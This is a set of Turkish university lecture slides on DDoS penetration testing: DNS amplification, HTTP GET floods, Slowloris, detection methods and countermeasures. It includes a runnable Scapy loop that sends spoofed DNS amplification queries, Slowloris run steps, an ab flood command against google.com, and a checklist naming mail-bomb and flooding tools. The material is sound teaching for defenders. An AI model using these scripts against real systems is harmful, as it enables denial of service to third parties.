ddos sızma testleri - 2

DDoS Saldırıları (Devam)DDoS Saldırı Algılama

Karsı Onlemler

BotNet Karsı OnlemlerDDoS Pentest

Servis Dısı Bırakma Testleri - 2BGM 554 - Sızma Testleri ve Guvenlik Denetlemeleri-II

Bilgi Guvenligi MuhendisligiYuksek Lisans Programı

Dr. Ferhat Ozgur [email protected]

Istanbul Sehir Universitesi2016/2017 - Bahar

Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2


Karsı Onlemler


Icindekiler

1 DDoS Saldırıları (Devam)DNS AmplificationDNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı

2 DDoS Saldırı AlgılamaGirisActive ProfilingSequential Change-PointDalgacık Analizi

3 Karsı OnlemlerKarsı OnlemlerSaldırıyı Absorbe Etmek

Servis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress FilteringEgress FilteringTCP InterceptHoneypotsLoad-Balancing

4 BotNet Karsı OnlemlerRFC 3704 FiltrelemeGelismis Koruma Aracları

5 DDoS PentestDDoS PentestGelismis DDoS KorumaYontemi



Karsı Onlemler

BotNet Karsı OnlemlerDDoS Pentest DNS Amplification

DNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı

Icindekiler









Karsı Onlemler



DNS Amplification I

DNS Amplification

I Yansıtma (Reflection) saldırısıdır. Kurban adresi kullanılarakIP spoofing.

I Sorgu paketleri yaklasık 60 byte, cevap paketleri 3-4 kbyte

I Saldırgan, hedef A kayıdı icin kurban kaynak adresine sahip birDNS istegi gonderir.



Karsı Onlemler



DNS Amplification II

Sekil: DNS Amplification 1



Karsı Onlemler



DNS Amplification III

Sekil: Spamhouse DDoS Saldırısı 2

1http://blog.sflow.com/2013/10/dns-amplification-attacks.html2https://blog.cloudflare.com/the-ddos-that-knocked-spamhaus-offline-and-

ho/Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2


Karsı Onlemler



DNS Amplification - Scapy I

#!/usr/bin/python

from scapy.all import *

victimIP = "192.168.4.46"

dnsIP = "8.8.8.8"

while True:

send(IP(dst=dnsIP ,src=victimIP)

/UDP(dport =53)

/DNS(rd=1,qd=DNSQR(qname="www.sehir.edu.tr"))

,verbose =0)



Karsı Onlemler



DNS Amplification - Scapy II



Karsı Onlemler



HTTP GET Seli I

HTTP GET Seli

I Sahte olmayan IP adresleri ile bir veya birden fazla makinedenes zamanlı olarak istek gonderilmesi

I Kullanılan araclarI Apache JMeter (Load testing)I AB: Apache HTTP server benchmarking tool

Listing 1: HTTP GET Seli

$ ab -n 10000 -c 500 http ://www.google.com/



Karsı Onlemler



HTTP GET Seli II



Karsı Onlemler



HTTP GET Seli III



Karsı Onlemler



HTTP GET Seli IV



Karsı Onlemler



Slowloris I

Slowloris/SlowHTTP

I Diger flood saldırı yontemlerinden farklı

I Birden fazla baglatı acar

I Acılan baglantıları olabildigince uzun sekilde acık tutmayacalısır.

I Tamamlanmayan HTTP istekleri gonderir. Hicbir zaman tamdongu olmaz

I Sunucunun ”maximum concurrent connection pool”doldurmaya calısır.



Karsı Onlemler



Slowloris II

How use Slowloris

Requirements:

# sudo apt-get update

# sudo apt-get install perl

# sudo apt-get install libwww-mechanize-shell-perl

# sudo apt-get install perl-mechanize

1)Download slowloris.pl

2)Open Terminal

2)# cd /thePathToYourSlowloris.plFile

3)# ./slowloris.pl

4)# perl slowloris.pl -dns (Victim URL or IP) -options



Karsı Onlemler



Slowloris III



Karsı Onlemler



Slowloris IV



Karsı Onlemler

BotNet Karsı OnlemlerDDoS Pentest Giris

Active ProfilingSequential Change-PointDalgacık Analizi

Icindekiler









Karsı Onlemler



Giris

DDoS Saldırı Algılama

I DDoS saldırılarını algılama yontemleri genel olarak, daha once trafikpaternlerinin (desenlerinin) izlenmesine dayanır.

I Trafik izlenerek, patern uzerinde meydana gelen beklenmeyendegisiklikler gozlemlenir.

I illegal trafik

I Saldırı: normal ve beklenen trafik uzerinde meydana gelen anormalve dikkat cekici olan sapmalar.

I Kullanılan teknik:I Hizmet kesintiye ugramadan algılamalı.I Hızlı sekilde cevap vermeli.I False-positive oranı dusuk olmalı.

I Kullanılan yontemler:I Activity ProfileI Sequential Change point

I Wavelet analysis



Karsı Onlemler



Active Profiling

Active Profiling

I Activity profile: Belirli bir zaman suresi (ornek 1 sn)icerisinde ag icerisinde gelen paket, istek sayısı

I Paket baslık bilgileri kullanılır.I ProtokolI Src/Dst IPI Src/Dst Port

I Benzer ozelliklere sahip olan istekler farklı kumelere ayrılır.

I Activity level: Bir kumede yer alan network flow’larının sayısıbize o kumenin aktivite sayısını verir. (Belirli bir suredahilinde)

I Activity level icerisinde meydana gelecek artıs bize bir DDoSolabileceginin sinyalini verir.



Karsı Onlemler



Active Profiling - Backscatter Analysis Project

Backscatter Analysis Project3

I Amac: DDoS aktivitesini algılamak.

I Saldırganlar kaynak IP adres sahtekarlıgı (src IP spoofing)yapar,

I Kurban, spoof edilmis adrese cevap gonderdir.

I Paketler geri yayılırlar (backscattered)

I Bu calısmada geri-yayılan (backscattered) paketler, kaynak IPadreslerine gore (kurban) kumelenir.

I her bir kume icerisinde aktivite seviyesi, gonderdigi paketlerdeyer alan IP adreslerinin degeridir.

3Moore, David, et al. Inferring internet denial-of-service activity. ACM Transactions on Computer Systems

(TOCS) 24.2 (2006): 115-139.



Karsı Onlemler



Active Profiling - Activity Level DDoS Detection I

Activity Level DDoS Detection4

I IP baslıklarında yer alan bazı bilgilerinin entropy ve ki-kare(chi-square) dagılımları hesaplanarak ulasılmaktadır.

I Entropy (Information Theory): Duzensizligin olcusu, n adetbagımsız degisken ve herbirinin secilme olasılıgı pi olsun;H = −

∑ni=1 pi log2 pi

I Kumeler, en cok gorunen kaynak IP adreslerine gore ayrılır.I Kume1: 1 IP adresi.I Kume2: 4 IP adresi.I Kume3: 256 IP adresi.

I Kume4: 4096 IP adresi.I Kumen: Geri kalan butun

kaynak IP adresleri



Karsı Onlemler



Active Profiling - Activity Level DDoS Detection II

4Feinstein, Laura, et al. ”Statistical approaches to DDoS attack detection and response.” DARPA Information

Survivability Conference and Exposition, 2003. Proceedings. Vol. 1. IEEE, 2003.



Karsı Onlemler



Sequential Change-Point Detection I

Sequential Change-Point DetectionI Yontem genel olarak saldırılar sonucunda trafik istatistiginde meydana

gelen ani degisimleri algılar.

I Hedef Bilgisayar, hedef port, haberlesme protokolune gore filtrelemeyapar.

I Ag trafigini zaman-serisi seklinde saklar.

I Ag akıs oranında herhangi bir degisiklik oldugunda bunu bilgilendirir.

I CUSUM surekli veriler uzerinde calısan bir degisim noktası tespit

algoritmasıdır.I Esik degeri secimine gore false-positive veya algılama gecikmesi

yasanabilir.

fn =

[fn−1 +

µ1 − µ0

σ2

(yn −

µ1 + µ0

2

)](1)



Karsı Onlemler



Sequential Change-Point Detection II

Sekil: DDos Saldırısı5



Karsı Onlemler



Sequential Change-Point Detection III

5Wang, Shangguang, et al. ”Detecting SYN flooding attacks based on traffic prediction.” Security and

Communication Networks 5.10 (2012): 1131-1140.



Karsı Onlemler



Dalgacık Analizi (Wavelet Analysis)

Sekil: Dalgacık Analizi 6

6http://groups.geni.net/geni/wiki/FirstGenBrooksDr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2


Karsı Onlemler


Karsı OnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıIngress Filtering

Egress FilteringTCP InterceptHoneypotsLoad-Balancing

Icindekiler









Karsı Onlemler




Karsı Onlemler

Karsı Onlemler

I Saldırının absorbe edilmesi

I Servis hizmetinin azaltılması

I Hizmetin kapatılması



Karsı Onlemler




Saldırıyı Absorbe Etmek

Saldırıyı Absorbe Etmek

I Ek kapasiteye ihtiyac duyulur.

I Daha onceden planlama ve cozumun gerceklestirilmis olmasıgerekir.

I Kapasitenin eklenmesiyle ilgili dogrudan ve devam edenmaliyetlerin bilincinde olmamız gerekir

I computing, storage, network equipment, standby servers,replication of data



Karsı Onlemler




Servis Hizmetinin Azaltılması

Servis Hizmetinin Azaltılması

I Saldırı esnasında butun servislerin ayakta ve calısır haldeolması gerekmeyebilir.

I Kritik isletme fonksiyonlarını yerine getiren bilisim sistemleridegerlendirilmeli

I Bunların DoS saldırısına karsı korunması icin stratejibelirlenmelidir.

I Sunulan hizmetlerden alt kumeler olusacak sekilde (orn: kritikservisler)



Karsı Onlemler




Hizmetin Kapatılması

Hizmetin Kapatılması

I Zarar, kontrolun otesine gectiginde, tum servisleri planlı birsekilde kapatmak ve ardından asamalı bir sekilde normaledonmek en iyisidir.

I Tum saldırılara karsı koruma saglamak icin kolay bir yol veyatek bir yol yoktur.



Karsı Onlemler




Ingress Filtering

Ingress Filtering

I Tanım: gelen paketlerin aslında kaynak olduklarını iddia edenaglardan geldigine emin olmak icin kullanılan bir tekniktir.

I Paketler ag’ınız icerisine alınmadan once dogru olmayanadreslere sahiplerse, bunları filtreleyin.

I Mesru (legitimate) kaynak IP

I Bilinen IP adreslerinden gelen saldırıları engellemez.

I Saldırganın sahte kaynak IP adreslerinden saldırı baslatmasınıyasaklar.

I Bu filtreleme, kaynak adresi izlememize yardımcı olur.



Karsı Onlemler




Egress Filtering

Egress Filtering

I Agdan ayrılan IP paket ustbilgileri gecerli kriterleri karsılayıpkarsılamadıklarını kontrol etmek icin taranır.

I Kriterleri karsılayan paketlerin agın dısına cıkmasına izinverilecektir

I Sahte IP adresleri bulunan bircok DDoS paketi iptal edilir.

I Yetkisiz veya kotu niyetli trafigin ev agından ayrılmasına izinvermez.



Karsı Onlemler




Ingress - Egress Filtering

Sekil: Ingress - Egress Filtering 7

7http://1100029f.blogspot.com.tr/2012/04/ccd2c01-p02-1100029f.htmlDr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2


Karsı Onlemler




TCP Intercept I

TCP Intercept

I TCP sunucularını SYN flood saldırılarından korumak icintasarlanmıstır.

I TCP Intercept yazılımları, istemci tarafından gonderilen SYNpaketlerini keser, eger istemci erisim listesinde (access list) yeralırsa baglantıyı izin verir.

I Aynı sekilde sunucu ile istemcinin yerine iletisime gecerbaglantı kurulduktan sonra aradan cekilir.

I Sahte istemci baglantı isteklerinin sunucuya ulasmasınıengeller.



Karsı Onlemler




TCP Intercept II

Sekil: TCP Intercept 8

8http://flylib.com/books/en/2.464.1.51/1/Dr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2


Karsı Onlemler




Honeypots

Honeypots

I Honeypots: Sahte bilgisayar sistemleriI Yem olarak kurulurlarI Saldırganlar hakkında bilgi toplamak icin kullanılır.

I Sınırlı guvenlik ayarlarına sahip sistemlerI Saldırganı cekmekI Footprint tanımakI Ana Sunucuyu korumak

I Saldırganların dikkatini ana sunucu yerine bunlarayonlendirmek icin kullanılır.

I Saldırı yontemleri, teknikleri vb. hakkında yeterli bilginin eldeedilebilmesi icin ana sunucuların hemen hemen tumozelliklerine sahip olmalı.



Karsı Onlemler




Honeypots Turleri

Honeypots Turleri

I High interaction honeypotsI Gercek zafiyet iceren hizmetler ve yazılımlar icerir.I Gercek isletim sistemleri ve uygulamalar icerirler.I Saldırının, sızma saldırısının veya zararlı yazılımın gercek

ortamda nasıl calısacagına ulasılır.I Honeynets: tuzak da dahil olmak uzere tum bilgisayar agının

tum duzenini iceren altyapıdır ve saldırı ayrıntılarını yakalarlar.I http://project.honeynet.org

I Low interaction honeypotsI Saldırgan veya zararlı yazılımla kısıtlı etkilesime girenlerI sunulan butun servisler taklit (emulate) edilir.I Kendisi zafiyet icermemekte, dolayısıyla somuruler (exploits)

sonucunda enfekte olmayacaktır.



Karsı Onlemler




Load-Balancing

Load-Balancing

I Isi, iki ya da daha fazla bilgisayar, islemci, sabit disk ya dadiger kaynaklar arasında paylastırma teknolojisidir. 9

I En iyi kaynak kullanımı, en yuksek islem hacmi, en dusukcevap suresi saglanabilir; olusabilecek asırıyuklemeden(overload) kurtulunabilir.

9https://tr.wikipedia.org/wiki/Yuk dengelemeDr. Ferhat Ozgur Catak [email protected] Servis Dısı Bırakma Testleri - 2


Karsı Onlemler




DDoS’a Karsı Cozumler (SANS)

Sekil: SANS DDoS Protection 10

10https://www.sans.org/reading-room/whitepapers/firewalls/leveraging-load-balancer-fight-ddos-33408



Karsı Onlemler

BotNet Karsı OnlemlerDDoS Pentest RFC 3704 Filtreleme Gelismis Koruma Aracları

Icindekiler









Karsı Onlemler


RFC 3704 Filtreleme

RFC 3704 Filtreleme

I RFC 3704: Ingress Filtering for Multihomed NetworksI Black hole filtering

I Gelen veya giden trafigin silindigi (veya ”dustugu”) agdakiyerleri ifade eder, kaynaga verilerin hedeflenen alıcıyaulasmadıgına dair bilgi vermez.

I Servis saglayıcılar tarafından genellikle erisim listeleriuygulanmadan trafik filtrelemesi icin kullanılan bir tekniktir.

I Ornekler: ”packets destined to 192.168.1.1 are discarded”,”Disable ICMP unreachable packets”



Karsı Onlemler


Gelismis Koruma Aracları

Araclar

I DDoS Protector

I FortiDDoS appliances

I Arbor Pravail Availability Protection System

I Cisco Guard XT

I Wanguard

I SDL Regex Fuzzer

I NetFlow Analyzer

I Netscaler application firewall

I AntiDDoS Guardian



Karsı Onlemler

BotNet Karsı OnlemlerDDoS Pentest DDoS Pentest

Gelismis DDoS KorumaYontemi

Icindekiler









Karsı Onlemler



DDoS Pentest I

1 Pentest’in amacı ve planını tanımlayın2 Sunucu veya uygulama uzerinde yapay istekler olusturarak yuk

testi (load test) gerceklestirinI Webserver Stress Tool, Web Stress Tester, JMeter

3 Agı tarayarak DoS acıklarını kontrol edin. Nmap, GFILANGuard veya Nessus gibi aracları kullanabilirsiniz.

4 Hedefi baglantı istek paketleriyle bogarak sunucuda SYNsaldırısı yapın. Araclar: DoS HTTP, Sprut

5 Sunucu uzerine cok sayıda TCP veya UDP paket gondererek”port flooding” saldırısı yapın. Araclar: Pepsi5, Mutilate



Karsı Onlemler



DDoS Pentest II

6 E-posta sunucusunda, e-posta bombardımanı calıstırın.Araclar: Mail Bomber, Advanced Mail Bomber

7 Web sitesi formlarını ve ziyaretci defterini keyfi ve uzungirdileri kullanarak sahte girislerle doldurun.

8 Son olarak, tum bulguları belgeleyin ve belirlenen sorunlarıncozumunde bir sonraki adımları baslatın.



Karsı Onlemler



Gelismis DDoS Koruma Yontemi

Gelismis DDoS Koruma Yontemi

1 Ag ortamını degerlendirin ve bir savunma planı gerceklestirin

2 Kapsamlı ve katmanlı bir DDoS stratejisi gelistirin

3 Altyapı (infrastructure) duzeyinde kontrol uygulayın

4 DNS sunucularını ve diger kritik altyapıyı koruyun

5 Kurum ici ozel DDoS aracları uygulayın


ddos sızma testleri - 2

Software